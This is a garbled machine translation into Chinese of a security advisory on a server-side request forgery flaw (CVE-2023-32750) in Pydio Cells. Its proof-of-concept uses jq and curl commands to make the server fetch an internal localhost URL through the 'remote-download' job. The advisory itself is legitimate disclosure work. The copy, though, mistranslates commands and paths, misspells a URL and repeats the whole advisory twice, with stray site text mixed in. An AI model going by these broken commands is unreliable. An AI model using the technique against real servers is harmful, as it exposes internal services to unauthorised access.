利用标题: PYDIO单元4.1.2-服务器端请求伪造
受影响的版本: 4.1.2和更早版本
固定版本: 4.2.0,4.1.3,3.0.12
漏洞类型:服务器端请求伪造
安全风险:媒介
供应商URL: https://pydio.com/
供应商状态:已通知
咨询URL: https://www.redteam-penting.de/ADVISOIRES/RT-SA-SA-2023-005
咨询状态:发布
CVE: CVE-2023-32750
CVE url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-32750
介绍
===============
'Pydio Cells是一种开放核,自托管的文档共享,
专为组织设计的协作平台(DSC)
不需要安全的高级文档共享和协作
权衡或合规性问题。”
(来自供应商的主页)
更多细节
===============
使用Pydio单元格的剩余API可以启动作业。为了
例如,重命名文件或文件夹时,http请求类似
以下是发送的:
----------------------------------------------------------------------------------------------------------------------
put/a/aibs/user/move http/2
HOST: example.com
用户代理:代理
ACCEPT:应用程序/JSON
授权: BEARER G4ZRN [.]
content-type:应用程序/json
内容长度: 140
{
'Jobname':'移动',
'jsonparameters':'{\'nodes \': [\'cell/file.txt \'],\'target \': \'cell/rened.txt \',\'
}
----------------------------------------------------------------------------------------------------------------------
身体包含一个带有工作名称和其他的JSON对象
作业的参数。除了“移动”工作,也是该名称的工作
存在“远程下载”。它需要两个附加参数:'urls'和
'目标'。在“ URL”参数中,可以指定URL的列表,并在
可以指定参数“目标”路径,以保存该路径
回复。启动工作后,HTTP获取请求将从
PYDIO单元服务器到指定的URL。答复被保存到
文件,将其上传到Pydio单元格中的指定文件夹。
潜在错误是在Websocket频道中传播的,可以是
通过“/WS/事件”端点打开。
概念证明
=====================
登录PYDIO单元格,并从HTTP请求中检索JWT。然后,
运行以下命令以启动“远程下载”作业以触发
HTTP请求:
----------------------------------------------------------------------------------------------------------------------
$导出jwt='插入jwt在这里'
$ echo'{'urls': ['http://localhost:8000/internal.html'],'target':'herseply-files'}'\
| jq'{'jobname':'远程下载','jsonparameters':(。| toString)}'\
| T恤远程下载
$ curl-头- 授权:携带者$ jwt'\
-HEADER'CONTENT-TYPE:应用程序/JSON'\
- 重复put \
-data @remote-download.json'https://example.com/a/jobs/user/remote-download'
----------------------------------------------------------------------------------------------------------------------
JSON文档中的URL指定要请求的URL。 “目标”
同一文档中的字段指定响应保存的文件夹。
之后,响应包含在指定文件夹中的文件中。
通过Websocket频道传达潜在错误。
解决方法
=============
限制Pydio Cells Server可以提供的服务,用于
示例使用出站防火墙。
使固定
===
将pydio单元格升级到没有漏洞的版本。
安全风险
=================
风险高度依赖于攻击的环境
Pydio单元实例运行。如果有任何内部HTTP服务
在同一机器或同一网络中揭示敏感数据,
服务器端请求伪造脆弱性可能会带来重大
风险。在其他情况下,风险可以忽略不计。所以,
总体而言,漏洞被评为中型风险。
时间表
==========
已确定的2023-03-23漏洞
2023-05-02客户批准向供应商披露
2023-05-02供应商已通知
2023-05-03请求CVE ID
2023-05-08供应商发布了固定版本
2023-05-14分配了CVE ID
2023-05-16供应商在发布建议之前再要求几天
2023-05-30咨询发布
参考
=============
redteam pentesting GmbH
================================
Redteam Pentesting提供了由A执行的个人穿透测试
专业IT安全专家团队。特此,安全弱点
公司网络或产品被发现,可以立即修复。
由于该领域只有很少的专家,因此Redteam Pentesting想要
分享其知识并通过研究来增强公众知识
与安全有关的区域。结果可作为公开
安全咨询。
可以在:中找到有关Redteam Pentesting的更多信息
www.redteam-pentesting.de
在Redteam Pentesting工作
=======================================
Redteam Pentesting正在寻找渗透测试人员加入我们的团队
在德国亚兴。如果您有兴趣,请访问:
jobs.redteam-pentesting.de
受影响的版本: 4.1.2和更早版本
固定版本: 4.2.0,4.1.3,3.0.12
漏洞类型:服务器端请求伪造
安全风险:媒介
供应商URL: https://pydio.com/
供应商状态:已通知
咨询URL: https://www.redteam-penting.de/ADVISOIRES/RT-SA-SA-2023-005
咨询状态:发布
CVE: CVE-2023-32750
CVE url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-32750
介绍
===============
'Pydio Cells是一种开放核,自托管的文档共享,
专为组织设计的协作平台(DSC)
不需要安全的高级文档共享和协作
权衡或合规性问题。”
(来自供应商的主页)
更多细节
===============
使用Pydio单元格的剩余API可以启动作业。为了
例如,重命名文件或文件夹时,http请求类似
以下是发送的:
----------------------------------------------------------------------------------------------------------------------
put/a/aibs/user/move http/2
HOST: example.com
用户代理:代理
ACCEPT:应用程序/JSON
授权: BEARER G4ZRN [.]
content-type:应用程序/json
内容长度: 140
{
'Jobname':'移动',
'jsonparameters':'{\'nodes \': [\'cell/file.txt \'],\'target \': \'cell/rened.txt \',\'
}
----------------------------------------------------------------------------------------------------------------------
身体包含一个带有工作名称和其他的JSON对象
作业的参数。除了“移动”工作,也是该名称的工作
存在“远程下载”。它需要两个附加参数:'urls'和
'目标'。在“ URL”参数中,可以指定URL的列表,并在
可以指定参数“目标”路径,以保存该路径
回复。启动工作后,HTTP获取请求将从
PYDIO单元服务器到指定的URL。答复被保存到
文件,将其上传到Pydio单元格中的指定文件夹。
潜在错误是在Websocket频道中传播的,可以是
通过“/WS/事件”端点打开。
概念证明
=====================
登录PYDIO单元格,并从HTTP请求中检索JWT。然后,
运行以下命令以启动“远程下载”作业以触发
HTTP请求:
----------------------------------------------------------------------------------------------------------------------
$导出jwt='插入jwt在这里'
$ echo'{'urls': ['http://localhost:8000/internal.html'],'target':'herseply-files'}'\
| jq'{'jobname':'远程下载','jsonparameters':(。| toString)}'\
| T恤远程下载
$ curl-头- 授权:携带者$ jwt'\
-HEADER'CONTENT-TYPE:应用程序/JSON'\
- 重复put \
-data @remote-download.json'https://example.com/a/jobs/user/remote-download'
----------------------------------------------------------------------------------------------------------------------
JSON文档中的URL指定要请求的URL。 “目标”
同一文档中的字段指定响应保存的文件夹。
之后,响应包含在指定文件夹中的文件中。
通过Websocket频道传达潜在错误。
解决方法
=============
限制Pydio Cells Server可以提供的服务,用于
示例使用出站防火墙。
使固定
===
将pydio单元格升级到没有漏洞的版本。
安全风险
=================
风险高度依赖于攻击的环境
Pydio单元实例运行。如果有任何内部HTTP服务
在同一机器或同一网络中揭示敏感数据,
服务器端请求伪造脆弱性可能会带来重大
风险。在其他情况下,风险可以忽略不计。所以,
总体而言,漏洞被评为中型风险。
时间表
==========
已确定的2023-03-23漏洞
2023-05-02客户批准向供应商披露
2023-05-02供应商已通知
2023-05-03请求CVE ID
2023-05-08供应商发布了固定版本
2023-05-14分配了CVE ID
2023-05-16供应商在发布建议之前再要求几天
2023-05-30咨询发布
参考
=============
redteam pentesting GmbH
================================
Redteam Pentesting提供了由A执行的个人穿透测试
专业IT安全专家团队。特此,安全弱点
公司网络或产品被发现,可以立即修复。
由于该领域只有很少的专家,因此Redteam Pentesting想要
分享其知识并通过研究来增强公众知识
与安全有关的区域。结果可作为公开
安全咨询。
可以在:中找到有关Redteam Pentesting的更多信息
RedTeam Pentesting GmbH - Home
RedTeam Pentesting is specialised in performing penetration tests. Mandated by worldwide customers, security vulnerabilities in IT systems are uncovered.
www.redteam-pentesting.de
=======================================
Redteam Pentesting正在寻找渗透测试人员加入我们的团队
在德国亚兴。如果您有兴趣,请访问:
Werde eine*r von uns!
Interesse an einer Anstellung als Penetrationstester*in? Bewirb dich jetzt bei RedTeam Pentesting!
jobs.redteam-pentesting.de